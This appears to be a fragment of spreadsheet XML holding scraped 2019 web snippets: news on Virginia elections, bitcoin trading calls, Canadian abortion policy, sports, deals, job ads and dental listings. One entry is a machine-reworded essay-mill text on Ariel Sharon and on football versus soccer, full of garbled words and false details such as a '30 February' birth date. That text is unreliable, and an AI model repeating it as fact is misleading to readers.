to turn out their voters to rack up some wins in this “swing”/”purple” part of Virginia. Finally, the deep-“blue” cities of Norfolk and Richmond are interesting in that they demonstrate how greatly Democratic turnout can fluctuate in different election years. For instance, in Norfolk, turnout has ranged from as low as 20k (17%) in 2011 to as high as 88k (71%) in 2008 and 83k (71%) in 2016. In Richmond, I don’t have complete data, but turnout hit 103k in 2016 compared to just 45k in 2009. In Norfolk, some Democratic candidates who could win or lose depending on turnout include: Phil Hernandez in HD100, Nancy Guy in HD83 (although Norfolk’s a very small percentage of HD83, if it’s a close election, it could definitely make the difference), and also Cheryl Turpin in SD7 (again, Norfolk makes up a small but potentially important part of the district). In Richmond City, voter turnout could be crucial to Democrats’ chances of winning HD66 (Sheila Bynum-Coleman vs. Speaker Kirk Cox), HD68 (Del. Dawn Adams vs. Republican Garrison Coward), and SD10 (Democrat Ghazala Hashmi vs. Republican Sen. Glen Sturtevant). Democrats really need to maximize turnout in the deep-blue areas (e.g., Richmond City) of these districts, something Democrats didn’t particularly accomplish in 2015. P.S. On a related note, see Cindy’s excellent article, The Best Thing You Can Do to Defeat Trump in 2020 is to Help Virginia Win in 2019. Also, of course, make sure you donate to Democratic candidates, phone bank, canvass, etc., etc.</t>
  </si>
  <si>
    <t>Sean McCormick</t>
  </si>
  <si>
    <t>With the transfer window nearing a conclusion, the Sunday papers have a host of fresh Newcastle United transfer links This post written by Sean McCormick originally appeared on ChronicleLive - Newcastle United FC. Read the full post here. Source</t>
  </si>
  <si>
    <t>Travel Vlog Sapporo, Hokkaido Japan The post Travel Vlog ✈ Sapporo, Hokkaido Japan appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>I love old movies. [The YouTube] What’s been on your mind? Got something you’d like to share? A topic to discuss? It’s Sunday Night Open Thread. Who wants to start? 0 0</t>
  </si>
  <si>
    <t>The pseudonymous Majin isn’t the most popular trader on Crypto Twitter, but even haters must admit that he’s got a knack for reading the market and has been on a hot streak since at least December 2018. Just to give you an example of how he called the bitcoin bottom, he tweeted a chart on January 28 that shows the leading cryptocurrency bottoming out at $3,200 and pumping above $4,000. As we all know, that came to pass. This triggers the bear. pic.twitter.com/nIR4LfUFQE — Majin (@majinsayan) January 28, 2019 Since then and up until recently, Majin has been calling for bitcoin to trade higher. When people were thinking that $6,000 was the end of the rally, the analyst called for a swift move above $7,000. When bitcoin breached $8,000, the trader continued to be bullish. Majin relied on a technical indicator (white dots) showing that bitcoin was trending higher. Majin was confident to make bullish calls as price traded above the white dots over the last few months | Source: Twitter In addition to that, Majin also studies buy and sell walls. As a liquidity game-theorist, the understanding of how bulls operated buy bots enabled the trader to make spot-on calls. This put the pseudonymous account a cut above other technical analysts in the community. Buy-bot active pic.twitter.com/AIx5JTLPG3 — Majin (@majinsayan) July 24, 2019 Unfortunately, Twitter’s biggest bitcoin bull has now turned bearish. In a series of tweets, Majin explains why he suddenly reversed course on his outlook, and it has to do with a technical indicator called volume-weighted average price (VWAP). Bears Control Bitcoin as It Failed to Break Above the Volume Weighted Average Price (VWAP) In a nutshell, VWAP is a technical indicator that can reveal the trend of an asset. If the price is below the VWAP, it means that most traders who recently entered positions are losing money. On the other hand, if the price is above the VWAP, traders who just entered positions are in the green. On July 25th, Majin posted a tweet showing that for the first time since February 2019, we are trading below the VWAP (turquoise line). This is quite literally the first time since februari that beras are in control. We’re trading below june’s vwap and our last pump failed to break it upwards. Magical white dots have acted as ideal short-entry lately pic.twitter.com/kzGrSUvW42 — Majin (@majinsayan) July 25, 2019 This is a bearish signal because it means that traders who recently bought positions are losing money. And, if they’re losing money, they’ll likely cut their losses soon. This can ignite a downward spiral that sends bitcoin to lower levels. “Demand has leaked away with each failure to break higher resistances or hold higher supports,” Majin wrote. If i’m wrong, you have something else to laugh over. But i’m sad with the fact I may be talking sense here. Bid-side support across the orderbooks are at an ATL atm. Demand has leaked away with each failure to break higher resistances or hold higher supports — Majin (@majinsayan) July 25, 2019 Majin then posted a chart with numerous green and red lines that come with very little explanation other than the captio: “The bottom-line.” The bottom-line pic.twitter.com/5T5Ydbf8uF — Majin (@majinsayan) July 25, 2019 The chart is quite difficult to read even for the experienced trader. Nevertheless, Majin’s message is simple. Bitcoin is printing lower highs while each layer of support is getting wrecked. With these insights, the liquidity game theorist predicts that the leading cryptocurrency will slice through support of $9,000. The demand is so weak that even $8,000 won’t offer a decent bounce. Trust me lads, 8keks will not bounce — Majin (@majinsayan) July 24, 2019 The good news is that there appears to be an end in sight. Majin sees a bounce at $7,000. This is around the same price level where we see bitcoin resuming its uptrend. High 7keks — Majin (@majinsayan) July 24, 2019 Bottom Line If the biggest bull in crypto-land has flipped bearish, then you might want to consider erring on the side of caution. After all, bitcoin has made a fantastic run over the last few months. Thus, it is due for a correction. Nevertheless, long-term investors and hodlers should not sweat this pullback. As a matter of fact, it can be your opportunity to buy on dips before the market resumes its uptrend. The biggest bull believes that bitcoin will bounce after this round of profit-taking. Click here for a real-time bitcoin price chart. Disclaimer: This article is intended for informational purposes only and should not be taken as investment advice.</t>
  </si>
  <si>
    <t>Canada is on the board at the Pan Am Games after squash players Hollie Naughton of Mississauga, Ont., and Samantha Cornett of Deep River, Ont., secured bronze on Saturday. CBC | Sports News Canada wins 1st medals of Pan Am Games in women’s squash</t>
  </si>
  <si>
    <t>Cebuano Chinese Dictionary – travel dictionary to translate Cebuano to Chinese. Click on the list to show Cebuano or Chinese synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Cebuano Chinese Dictionary →</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. Miley Cyrus' Hot Girl Summer Heats Up With Some Seriously Racy Photos Friday 19 July 2019 11:39 PM UTC-05 https://m.youtube.com/watch?v=5BRkOpFy4WY Miley Cyrus can’t–and never will–be tamed. On Friday, the pop songstress continued to push the envelope of what’s considered appropriate by Instagram’s standards when she… via https://youtu.be/mFQfuwZZ8h8</t>
  </si>
  <si>
    <t>Provinces making women pay for the cost of getting an abortion at private clinics are violating the Canada Health Act, federal Health Minister Ginette Petitpas Taylor has warned her provincial counterparts. In a letter shared Wednesday with the provincial health ministers, Petitpas Taylor said women in Canada continue to face barriers in accessing abortion and that the provinces must work to eliminate those, chiefly the costs being charged to women outside of hospital settings and lack of access to the abortion pill. READ MORE: How the wave of U.S. restrictions will affect Canadian women sent there for abortions Specifically, the letter urges the provinces to find solutions to the limited numbers of medical professionals willing to prescribe the abortion pill to their patients, something advocacy groups have flagged as a major barrier to women in small and remote communities. “I remain concerned about continued barriers to access to abortion across the country,” writes Taylor in the letter, a copy of which was shared with Global News. “I am troubled by reports that some patients may be facing unnecessary barriers or delays in receiving these medically necessary services. I am concerned as well about the practice of limiting coverage to hospital settings, with some patients facing charges for surgical abortion services provided in private clinics. “Such charges for a publicly insured service are contrary to the Canada Health Act.” WATCH BELOW: Forcing Canadian women to go to US for abortions ’cause for concern:’ health minister Her letter comes after a series of reports by media outlining the continued barriers women in Canada face in accessing abortion. The Globe and Mail recently detailed how a large number of Canadians doctors appear to be wary of being viewed as abortion providers and will not prescribe the abortion pill to patients, forcing women to drive hours and rely on word of mouth to seek out doctors who will. That report also flagged cases of Ontario and New Brunswick not fully covering the cost of surgical abortions that take place in clinics. Global News also reported in May how dozens of Canadian women are being forced to go south for abortions they are unable to access domestically. More to come… © 2019 Global News, a division of Corus Entertainment Inc. Source link</t>
  </si>
  <si>
    <t>Ultra Music Festival 2018 | Miami Festival Mashup Mix | Best Tracks – Mixed by daveepa. Don’t forget to Like &amp; Share the Mix on social media if you enjoyed it! Feel free to subscribe to my channel here https://www.goo.gl/fYPjL4 ◢ My Equipment: USB-Stick http://amzn.to/2vJ1Ryl * Pioneer DDJ SX2 (Controller) http://amzn.to/2uZ57aV * Controller alternative http://amzn.to/2vJrKOw […] The post Ultra Music Festival 2018 | Miami Festival Mashup Mix | Best Tracks appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Anna Patty</t>
  </si>
  <si>
    <t>Investigation launched into Endota Spa Sydney after it received requests for help from employees.</t>
  </si>
  <si>
    <t>Shannon Lee has claimed Quentin Tarantino turned her father into an “arrogant punching bag”. See full article at Film-news.co.uk » The post Bruce Lee's daughter slams 'uncomfortable' portrayal of her father in Quentin Tarantino movie appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Canadian super-producer Frank Dukes talks about making hits with 50 Cent, Drake and Camila Cabello. Artist Michael Rakowitz discusses his decision not to participate in this year's Whitney Biennial in an act of protest. Fashion designer Aurora James tells us how her brand Brother Vellies is redefining the possibilities of sustainable fashion. Actor and director Nandita Das takes us into the story of one of South Asia's greatest writers, Saadat Hasan Manto.</t>
  </si>
  <si>
    <t>Kirstie Wellauer</t>
  </si>
  <si>
    <t>Relatives visiting the gravestones of their family in a NSW town, who found the gravestones razed, thought it was the work of vandals.</t>
  </si>
  <si>
    <t>Peta Murphy has pleaded with her new parliamentary colleagues to "listen to the experts" who warn that Australia's health system is under threat.</t>
  </si>
  <si>
    <t>John Collett</t>
  </si>
  <si>
    <t>New laws being considered by parliament build on the reforms that started on July 1 to protect super fund members from paying for insurance they don't need</t>
  </si>
  <si>
    <t>Cristiano Ronaldo Jumps On Policeman After Fan Invaded Training We’re not sure what went through Cristiano Ronaldo’s head during a recent pre-season training session at the Nanjing Olympic Stadium, China. The five-time Ballon d’Or was chatting to his teammates when a fan invaded the pitch. But moments later, as security tackled the fan to the ground, Ronaldo decided to jump on a nearby policeman in a really random sequence of events. Invasione di campo durante l’allenamento della Juventus in Cina :flag_cn: La reazione di Ronaldo è… ‍ pic.twitter.com/M1j0Js4lqw – Goal Italia (@GoalItalia) July 23, 2019 The policeman, understandably confused by what was happening, waved away the Juventus forward as he laughed and joked to his teammates. Somebody on the ground captured footage of the incident but it still doesn’t clear up why he actually did it. Ronaldo jumps on a Chinese police officer as a fan invades Juve training :open_mouth: Look at the officer’s face :sweat_smile: pic.twitter.com/9JPwK7REhT – Oh My Goal (@OhMyGoalUS) July 24, 2019 Away from the training ground, Ronaldo made a young supporter’s day during Juventus‘ International Champions Cup game against Spurs. The former Manchester United winger was subbed off on the hour mark. And in the 80th minute, the TV cameras captured the 34-year-old engaging in conversation with the fan, giving him a high-five. “Everyone wants to meet the great man” Cristiano Ronaldo has made this kids day! :raised_hands:#ICC2019 pic.twitter.com/cr0Ikx6kOu – Premier Sports :tv: (@PremierSportsTV) July 21, 2019 Maurizio Sarri saw the little lad heading over to the Juventus bench but made sure stewards didn’t intervene, allowing him to have memories that will last a lifetime. “I thought security was going to come for him,” Sarri said, as per The Daily Mail. “When it is a kid it is not a pitch invasion, it is a moment of joy.” Thoughts on the incident involving Ronaldo and the policeman? Let us know in the comments. This post Cristiano Ronaldo Jumps On Policeman After Fan Invaded Training appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>At nearly $500 for the salad bowl, you’d think Alice Waters would handpick and rinse the lettuces for you herself. But no, she only inspired the new bowl for the Permanent Collection online shop. It’s a beautiful piece, fairly shallow and 13 1/4 inches across, with an alluring natural pattern. Ms. Waters selected redwood for the material because it’s light in weight and also because she has an affinity for the trees, one of which is in her backyard. The shape of the bowl is based on a ceramic one that she uses at home and is lathe-turned by Bruce Mitchell, an artisan California woodworker. Five percent of the price is donated to Ms. Waters’s Edible Schoolyard Project. Alice’s salad bowl, $495, permanentcollection.com. Follow NYT Food on Twitter and NYT Cooking on Instagram, Facebook and Pinterest. Get regular updates from NYT Cooking, with recipe suggestions, cooking tips and shopping advice. Source link</t>
  </si>
  <si>
    <t>More than 350 million trees have been planted in a single day to tackle deforestation, officials say. The post Ethiopia ‘breaks’ tree-planting record to tackle climate change appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Top Technology News -- ScienceDaily</t>
  </si>
  <si>
    <t>A new mathematical model describes how highly concentrated antibody solutions separate into different phases, similar to an oil and water mixture, which can reduce the stability and shelf-life of some drugs.</t>
  </si>
  <si>
    <t>ORDER OF PLAY CENTRE — 2:30 p.m. start Doubles final — Jaqueline CRISTIAN (ROU) / Elena-Gabriela RUSE (ROU) vs. [4] Viktoria KUZMOVA (SVK) / Kristyna PLISKOVA (CZE) Not before 5:00 p.m. Singles final — [Q] Patricia Maria TIG (ROU) vs. Elena RYBAKINA (KAZ) MATCH POINTS This will be the first meeting between Patricia Maria Tig and Elena Rybakina, both of whom are seeking their first WTA singles title. Unranked qualifier Tig is playing her first WTA-level main draw since Guangzhou in September of 2017. Tig missed all of 2018, first due to injuries and then to pregnancy, but the new mother has compiled a 25-7 record on the ITF World Tennis Tour since her return in April of this year. 24-year-old Tig is into her second WTA singles final. She reached the championship match at Baku in 2015 before losing to Margarita Gasparyan. Read more: Cinderella Tig soars into Bucharest final: ‘Motherhood helped me be better’ 20-year-old Rybakina is into her first WTA singles final this week, having just made her first-ever WTA semifinal at s-Hertogenbosch last month. Rybakina is currently at a career-high ranking of World No.106, but is projected to move into the Top 85 following her performance this week. Kristyna Pliskova is seeking her fourth WTA doubles title, while Viktoria Kuzmova aims to win her second. Their team will face opposition from the all-Romanian duo of Jaqueline Cristian and Elena-Gabriela Ruse, who are both contesting their first-ever WTA final.</t>
  </si>
  <si>
    <t>miguellin737</t>
  </si>
  <si>
    <t>Original Coupon Deal Posting this as a separate deal as part of the Sony 20% off promotion - Thanks to Dealbot for the original deal I think the price is good. This is my first post, please let me know if I need to correct anything.</t>
  </si>
  <si>
    <t>For almost 30 years, Johnson &amp; Johnson's Human Performance Institute has been training top athletes and business professionals to perform to their maximum.</t>
  </si>
  <si>
    <t>Ariel Sharon Essay Case The document “Ariel Sharon” is an first-rate example of some sort of essay upon people. Ariel Sharon came into this world in Kfar Malal, Language Man Middle east, on 30 February 1928. As early as his particular teenage years, Sharon showed that he was obviously a born standard. His kepemimpinan skills were definitely first recognised in the Haganah, an subterranean military compel that was the actual beginnings in the Israel Defense Forces (IDF). Sharon’s control skills were used for achievement. He needed a homeland for the Jews. Having been produced in Palestine, Sharon thought that Palestine was just as his land as the Palestinians. His parents, along with their neighbours in Kfar Malal acquired bought most of their land frankly from the Palestinians. In order to produce a Jewish homeland, a military force would have to be formed. The main Haganah, sometime later it was the IDF, was the armed service force to shield the Jewish residents on Palestine, which inturn later started to be the State of Israel. Sharon linked out of a sense survival. Because the State of Israel matured, throughout competitions, Sharon was a prominent find. He struggled with in the 6-8 Day Conflict, the Yom Kippur Struggle, and the quite tigeressay.com a few skirmishes using Israel’s Arab neighbors. Your dog became an overall and then-Defense Minister. Ultimately, in i b?rjan p? tv?tusentalet Sharon end up Prime Minister. His gathering, Likud, was built by Sharon. It was a challenging line alongside giving up any sort of territory towards the Palestinians. Nonetheless after a few years inside the Prime Minister’s office, Sharon realized that agreement with the Palestinians was a need to. He put together the Kadima party. This unique party desired to withdraw out of Gaza giving it to the Palestinians. Many were outraged, nonetheless he was re-elected as Perfect Minister. The guy held it until the person fell towards a coma in 2006. Today, Ariel Sharon continues to be in a coma. His selections and existence are fodder for substantially controversy. Nevertheless , even his or her most staunch critic would certainly agree Sharon was a director. Good or maybe bad, Sharon did everything that he thought was with regard to the Israeli people. Whether or not making townships in the Busy Territories or dismantling settlements in Gaza, Sharon made firm options. Sharon might possibly not have been the ideal Israeli Excellent Minister, yet he was a decisive a single. Hockey Vs Sports Essay Case The cardstock “Football As contrasted with Soccer” is a popular example of a great essay regarding sports along with recreation. The globe’s most popular game is soccer. To the Americans it is Soccer and to the people all over the world, it is basketball that is with excitement played in addition to enjoyed by way of over 190 countries. While in the 19th one particular hundred year, football evolved from an American mindset and had become called Usa Football. The two Association rugby as well as soccer football is governed by just FIFA (Federation International fitness Football Association) The spotlight of this brisk game will be its FIFA World Tumbler that is done once atlanta divorce attorneys four yrs. TIMORE also organizes football within the professional in addition to international degrees. The U . s citizens National Football League is exceedingly popular currently the chief skilled League on the earth. In doble with it may be the Major Little league Soccer. The very commonalities embraced between the a couple of games happen to be that each workforce should be consists of eleven participants and requires employing their legs plus heads using great competency to score an end into the enemy defending some sort of side. Difficulties differences amongst the two game are the scale the performing field. Regarding soccer, its 90 and even 120 d long and between 47 and ninety m diverse and for National football is normally 120 yd long plus 53 yd 1 legs wide. An additional unique standards is the tennis ball used in the overall game. Soccer uses around natural leather ball the fact that measures sixty-eight and 71 cm around circumference, and weighs concerning 396 for you to 453 gary, while in United states football a protracted spheroid along with a circumference for 28. five in in addition to weighs in relation to 14 to fifteen oz . The other one major differences are the using of uniforms and various ways of passing judgment. Basketball become far more00 exciting simply because fans have a much closer or possibly direct along with their celebrities, unlike soccer which is a tad bit more protected. The hands of time duration way too varies using soccer getting two 47 minute halves with an intermittence of a quarter-hour in between, where in footballing the game is made of four sectors comprising for 15 minutes any. Though the two games are generally loved throughout the globe and used much determination, soccer is a level more popular in comparison with football. Stephen Leacocks How to Live to be 190 and Catherine Pigotts Chicken-Hips Essay Instance The paper “Stephen Leacock’s How to Dwell to be 190 and Catherine Pigott’s Chicken-Hips” is a pleasurable example of a literature coursework. Stephen Leacock’s ‘How to live on to be 200’ and Catherine Pigott’s ‘Chicken-Hips’ voice their valuable irreverence to the fad with sculpting our body in correspondence to the fast-paced ‘health mania’. While Leacock attacks the lads who carry themselves towards heights regarding junk with exercise and staying fit, Pigott explains how concept of ladys beauty transformations from lifestyle to tradition, hinting at the Western delusion of self-punishment by question oneself as well as peace of mind in an effort to stay trim. There are some impressive similarities on the satirical composing of Leacock and Pigott, in the way these people celebrate the liberty to eat and perform what 1 truly favors. Leacock claims, ‘eat what you look for. Eat plenty of it. Of course, eat using it. ‘ And Pigot notices that will ‘a at all times not some thing to be toned and molded’. However , their own approach to the niche varies to some extent. Leacock only tries to warp the amount to which health-mania makes males unrealistic of their life, their very own habits and what they take in. But their irreverence towards the so-called healthy habits makes it impossible to evaluate whether many of them carry components of scientific reality, whether a person likes them or not. And so, he finally ends up making exciting of every well being habit and also suggests a new chaotic lifestyle tethering for hedonism. He even usually means improbable, even though extremely hilarious, remarks related to trapping oxygen in your particular room in addition to keeping that, or toning down bacilli together with treating this a family dog. However , Pigot tries to rest her thoughts about female body prototypes while in the African in addition to Western culture. Her composing style is way more realistic and just observes just how cultural outlooks on wonder varies. The woman tries to fine-tune herself so that you can both civilizations when the woman with in touch with these individuals and shows awareness of the main logic the fact that operates behind their locations outlook. Right through their works, Leacock preserves an irreverent tone, in addition to Pigot responds the categorical sensibility that characterizes the very narrator. Even if both documents could appeal to all kinds of viewers, Leacock evokes introspection by lambast together with sharp complaint while Pigot tries to always be both amusing and reasonable in him / her approach to the niche, suggesting a key rethinking regarding cultural essentialism.</t>
  </si>
  <si>
    <t>EDMONTON — Will the sixth time be the charm for the Toronto Argonauts? The Argos are looking for their first win of the season Thursday night when they match up against the Esks at the Brick Field at Commonwealth Stadium. Toronto is the only Canadian Football League without a victory this season, and they’re 1-14 over their last 15 games. “Can’t imagine a harder start to a season,” said Argonauts quarterback McLeod Bethel-Thompson in an interview with Argonauts.ca “But what doesn’t kill you makes you stronger and we have to believe that. We know we have the men in this locker room. We know we have the right man leading us. And we believe that we will work our way out of this.” RELATED » Depth Charts: TOR | EDM » Wilder, Edwards out for Argos in Week 7 » Gable, Daniels won’t suit up for Eskimos » Buy Tickets: Argos at Eskimos Photo: The Canadian Press On paper, it looks as if the Argos will be in tough against the Green and Gold. Toronto has the league’s worst offence (15 offensive points per game), defence (37.6 points allowed), and the worst turnover ratio (-13). They’ll also be up against the leading passer in the league in Trevor Harris, who’s thrown for a league-leading 1,633 yards to go with eight touchdown passes and two interceptions. But despite a 10-point loss in Calgary, the Argos showed they won’t go down without a fight this season. The Boatmen moved the ball all game and even edged the Stampeders in yards 410-244, but seven turnovers — including a fumble returned for a touchdown — were their undoing. Is Thursday night’s game a “trap game?” Don’t tell that to Head Coach Jason Maas. “I don’t believe in trap games.” Maas said. “It doesn’t matter what anybody’s record is. Whoever comes into this building has to leave with a loss.” Edmonton will be without the league’s second-best running back in terms of yards, C.J. Gable, who was placed on the one-game injured list. He’ll be replaced by promising young sophomore Shaq Cooper, who recently came off the six-game injured list. Receiver DaVaris Daniels will also be sidelined. Daniels has played just two games this season, making 10 catches for 85 yards after signing as a free agent. Canadian receivers Tevaun Smith and Natey Adjei will start in his absence, while Kenny Stafford moves over from his field wideout spot to the boundary. The short week could play against the Eskimos, who will play their second game in five days, and third in nearly two weeks. Quarterback Trevor Harris is raring to get back in the saddle for Edmonton, coming off a 20-10 loss to the Montreal Alouettes last weekend. “Whenever you come up short and don’t play as well as you want to, it’s always good to get back on the horse,” Harris said Argonauts receiver Derel Walker makes his return to Edmonton Thursday night. The 28-year old was signed by the Argonauts to a lucrative contract this past off-season. In his first season with Toronto, Walker has 23 catches and two touchdowns in five games. “We’re coming here to get our first win of the year,” Walker said. “I’m playing a former team so I’m just looking forward to it. I’m just going to go out there, enjoy it, and have fun. “Coming back here, I have so many friends. Played with a lot of teammates so it’ll be nice to see them guys. But at the end of the day, it’s business.” With an extra Canadian receiver in the lineup, the Eskimos bring international guard Travis Bond into the lineup ahead of rookie Kyle Saxelid. The Eskimos will be without Forrest Hightower on the defensive side of the ball. Defensive back Nick Taylor and Manitoba alum and wide receiver Shai Ross will enter the lineup for Edmonton. The Argos also have their share of injuries. They will be without a star running back of their own in James Wilder Jr., while slotback Armanti Edwards will also miss the game and has been placed on the one-game injured list. Sophomore running back Branden Burks gets the start in Wilder’s place, while shifty receiver Chandler Worthy moves into the starting lineup at receiver. Finally, tackle Isiah Cage will sit out Thursday’s game in favour of Roubbens Joseph, who will make his first career CFL start at left tackle. BY THE NUMBERS 14 — Argonauts head coach Corey Chamblin has lost 14 straight games as a head coach, dating back to 2015 when he lost nine games in a row as head coach of the Saskatchewan Roughriders. 0-6 — If Toronto loses Thursday night, the Argonauts will be 0-6 for the first time since 1981. 6 — Thursday night’s game will be former Argo Trevor Harris’s sixth career start against his Toronto. He is 2-3 in games against the Double Blue. 34 — Edmonton last played a home game in the second week of the season. It’s been 34 days. The Esks played three games and had a bye week in that span of time. Kickoff is at 9:30 p.m. ET and can be seen on TSN and ESPN+, and followed live via CFL.ca Game Tracker. – With files from Esks.com/Argonauts.ca FANTASY » Set your lineup in TSN CFL Fantasy » Total CFL Pick ‘Em: Make your Week 7 picks! » Fantasy Weekly: Lineup tools for Week 7 » Subscribe to the CFL Fantasy Podcast</t>
  </si>
  <si>
    <t>Part-time job offered. We are looking for a reliable person to clean our AirBnb apartments in Worley Village. Must have reliable transportation and a cell phone with text messaging. 17 dollars per hour on the payroll. Typical hours 11am-3pm. Weekday and weekend shifts available. If interested, please message your name and cell number, we will .. Read more</t>
  </si>
  <si>
    <t>Mack Horton's dramatic week at the world championships has culminated in a powerhouse anchor leg to lift Australia to a pulsating victory in the 4x200m relay.</t>
  </si>
  <si>
    <t>Do you like being outdoors? Then we have the job for you. The job is from April through till October. We are looking for a clean shaven, social butterfly. All you need to have to qualify is a license, your own small truck or van and know how to run a BBQ. If this interests .. Read more</t>
  </si>
  <si>
    <t>Diverse</t>
  </si>
  <si>
    <t>Just popped onto eBay and saw a purple banner on top for $5 off which requires a $5.01 minimum spend.</t>
  </si>
  <si>
    <t>Kogan2019</t>
  </si>
  <si>
    <t>Saw on Sketchers online for $69 discounted from $129. Even with the postage you can buy it for approx $58.</t>
  </si>
  <si>
    <t>3 reasons team can win 2019-20 NBA title Original Source Boston Celtics Kemba Walker (Photo by Tim Bradbury/Getty Images) Most experts believe the Boston Celtics took a step back from their championship aspirations this offseason. Here are three reasons why winning an NBA title this season is still well within this team’s reach. If you believe the pundits, the Boston Celtics are only the third or fourth best team in the Eastern Conference. Most publications and odds makers have the C’s running behind the 76ers, Bucks and, in some cases, the Pacers for conference supremacy. Meanwhile the Western Conference is as strong as ever, with the Rockets, Clippers, Jazz and Lakers among the teams battling to topple the suddenly vulnerable Warriors. Without Kyrie Irving and Al Horford, can the Boston Celtics compete for an NBA title this season? Yes, they can. And here are the three biggest reasons why Mayor Walsh should keep the duck boats well-tuned for yet another championship parade through the streets of Boston next summer.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3 reasons team can win 2019-20 NBA title appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>The 24-year-old victim of Tuesday’s Sydney knife attack has been described as a beautiful girl from a beautiful family, Hong Kong airport is up and running again after mass protests, and press freedom is back in the spotlight. Image: Instagram</t>
  </si>
  <si>
    <t>Source: https://www.wired.com/story/tardigrades-moon-space-water-bear-lunar-lander-cloudflare-8chan-el-paso Water Bears Crash Onto the Moon, Cloudflare Ditches 8Chan, and More News Catch up on the most important news from today in two minutes or less. Source: https://www.wired.com/story/tardigrades-moon-space-water-bear-lunar-lander-cloudflare-8chan-el-paso The post Water Bears Crash Onto the Moon, Cloudflare Ditches 8Chan, and More News appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>i Team</t>
  </si>
  <si>
    <t>Murder Case, a harrowing new documentary which follows a police team in Scotland investigating the murder of Julie Reilly, is set to air on BBC Two. Detective Chief Inspector Mark Bell, Police Scotland’s senior investigating officer, and his team attempt to work out what has happened to the 47-year-old grandmother, who went missing in Glasgow in 2018. The investigation takes a sinister turn when two of her leg bones are discovered near her home in Govan, and the story ends with a conviction a year later. Here’s what you need to know. When will Murder Case air on TV? Episode 1 of Murder Case will be broadcast on BBC Two at 9pm on 14 August. The following episodes in this three-part series will air at 9pm on 15 August and at 9pm on Wednesday 21 August. Each episode is an hour long. Andrew Wallace – left – and Julie Reilly – right (Photo: Police Scotland) What can viewers expect from the series? The docu-drama will give a rare all-access look behind the scenes of an escalating and extraordinarily brutal crime. Cameras will follow the police team as they put out a missing persons request and begin to search for Ms Reilly in the first episode. In the second episode, once detectives realise who their main suspect is, we see them pain stakingly gathering evidence and putting their case together in order to charge a local butcher, Stephen Wallace, with Ms Reilly’s murder. The third and final episode follows the detectives as they piece together the clues available to them that leads to Wallace’s eventual conviction. What happened to Julie Reilly and Stephen Wallace? If you don’t want to know what happened to Reilly and her killer ahead of viewing the documentary, look away now. Ms Reilly had a brain injury, which caused her complex issus with her reaction times, her speech and her memory. Wallace befriended her, and she allowed him to stay with her in her home after he split up with his girlfriend in December 2017. Wallace told her he would take care of her. Instead, he brutally ended her life, cutting her limbs off with a knife and removing her remains from the house in plastic bags and suitcases. Margaret Hanlon (centre) and Lynne Bryce, the mother and sister of Julie Reilly address the media outside the High Court in Glasgow after Andrew Wallace was jailed for life (Photo: PA) He would later tell a friend that the suitcases were full of deer meat he was trying to sell after he’d hit an animal driving in his car. Another was told the bags were full of dirty washing for Ms Reilly to take care of. The last recorded sighting of Ms Reilly was on 6 February 2018. Thinking her missing, her family made an emotional plea to the public for her safe return. Two months later, on 19 April, a member of the public found a bone with flesh attached in his front garden in Ardshiel Road. Another thigh bone was discovered near Reilly’s home, sparking a murder investigation, which eventually lead to Wallace being arrested and charged. An apparent burial site at Drumoyne Drive was also found by a member of the public. To start with, Wallace denied the charges, but later pled guilty at the High Court in Glasgow in February, and was handed a mandatory life sentence of 28 years. It also emerges in the series that Wallace had killed before: he murdered a woman when he was just 15 years old in 1992. More on TV Phoebe Waller-Bridge will be 'elated' when she says goodbye to Fleabag GBBO has a start date and it's sooner than you think Murder Case: How Julie Reilly's killer Andrew Wallace was caught Everything you need to know about Interior Design Masters Everything you need to know about Peaky Blinders series five There’s already a Jeffrey Epstein TV drama in the works The post Murder Case: when it’s on BBC Two tonight, and how the series explores what happened to Julie Reilly and Stephen Wallace appeared first on inews.co.uk. The post Murder Case: when it’s on BBC Two tonight, and how the series explores what happened to Julie Reilly and Stephen Wallace appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>The massive hunt for two teenagers suspected of shooting dead Australian tourist Lucas Fowler and his US girlfriend moves to the eastern Canadian province of Ontario with police receiving more than 30 tips within an eight-hour period.</t>
  </si>
  <si>
    <t>Find the best dentist or dental clinic in Kitchener, ON offering the dental services you are looking for. The premier destination for dental clinic listings in Toronto, ON. The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. Laurentian Dental Voted Best Kitchener Dentist Thank you for voting Laurentian Dental as your Favourite Kitchener Dental Office in The Record, Readers’ Select Awards! We sincerely care about your teeth, your smile, and you as an individual. Established dental clinic centrally located in downtown Kitchener with over 35 years serving Kitchener-Waterloo families. We would love to meet you and your family!. Locate and compare Dental Clinics &amp; Centres in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Stanley Park Dental Centre (now known as Grand River Dental Care), proudly providing dentistry in Kitchener and Waterloo areas since 1996. Dr. Paul Tan and associates are committed to excellence in family dentistry and general dental care. We welcome new. Those who are looking for a local dental office or clinic for care in Kitchener. Health Allergy Dental-Care Yoga Supplements Weight loss Hair Care Contact Ur healthy style blog. Locate and compare Dental Clinics &amp; Centres in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Top Dental Clinic In Kitchener Ontario Top Dental Clinic Near Kitchener Ontario Best Dentist In -&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2019/01/09/top-dental-clinic-near-kitchener-ontario-7. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan 